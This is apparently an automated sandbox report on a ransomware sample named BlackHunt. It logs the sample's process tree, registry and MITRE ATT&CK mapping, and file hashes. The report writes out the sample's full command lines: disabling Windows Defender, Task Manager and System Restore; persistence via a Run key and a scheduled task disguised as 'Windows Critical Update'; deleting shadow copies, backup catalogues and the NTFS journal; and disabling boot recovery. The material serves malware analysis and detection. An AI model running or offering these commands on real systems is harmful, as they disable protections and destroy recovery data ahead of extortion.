cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 56 PID 2232 wrote to memory of 2608 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 56 PID 2232 wrote to memory of 2608 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 56 PID 2232 wrote to memory of 1156 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 58 PID 2232 wrote to memory of 1156 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 58 PID 2232 wrote to memory of 1156 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 58 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe"C:\Users\Admin\AppData\Local\Temp\cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2232 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵PID:3064
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵PID:2676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2572
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:2848
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:1792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2600
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:1636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2248
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2728
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:1800
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2576
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:824
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2340
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2992
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2236
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:1104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2608
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:2972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:1156
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:1740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:468
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵
- Modifies registry class
PID:2676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2860
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1524
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:2468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2240
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1648
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:3036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1944
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2752
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:376
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:2736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1772
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1984
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:3016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1784
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:584
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2252
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1468
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2856
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2868
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵
- Suspicious use of WriteProcessMemory
PID:3064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe" /F2⤵PID:1248
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe" /F3⤵
- Creates scheduled task(s)
PID:2852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1112
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:1240
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1852
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:1920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:3020
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
- Modifies registry class
PID:664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2960
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1544
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1984
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2164
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3068
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2112
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1108
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:1492
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2684
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1048
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2140
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2236
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
3File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD59ca59442b9339b1347335f428b970537
SHA11b8449d299e499dde6532ec36531134c190b97c0
SHA25685afd2b1e534c50fba785b8c6f93c3fcb461f6f0615ea672ba361a5c531c5a68
SHA5121663a14edcc76a1f0c2ef7b5904371aca331d78d2d6729f0cd51384ec15425916bea655dd544f30ed976f7c5844d57c9bf037adf9d8057e21d90e57982018448
-
Filesize
12KB
MD510599a29098d6133628eb7fe1fcfe714
SHA1882b0f7d1316e4dc9227e6aca327eab57cfb9e16
SHA256c8c02f9c2af93a9b93147572be6fcefc34decc2ab3e12ef8bddbed5fb4fa66e5
SHA51233c258f1c028c83d004ebac4e20cca4a16a6e18b7c8b056da5e218e304c3742311e3a298e42e26392cbfb9a1d9fc4ca329c0ec496ab2222dbb75baa0a01dc6b1
-
Filesize
684B
MD57461f99a9f8ba405ca9f0e85cd026ec1
SHA161bf0b055839d53a84ad20da1bd3cb30fda81496
SHA25695dd12e4cfeaaea2f533b1d6d0835460bae913cba75e94fc6b9b8c9df0c5d096
SHA5125db4dcac75bde6afbd470969c652470da7c59656db4b33f60d9880b91407deb31be16f0a9d4999ecd4dfd044ddef10efffa89ec0790b2817542a6f6459c4cb70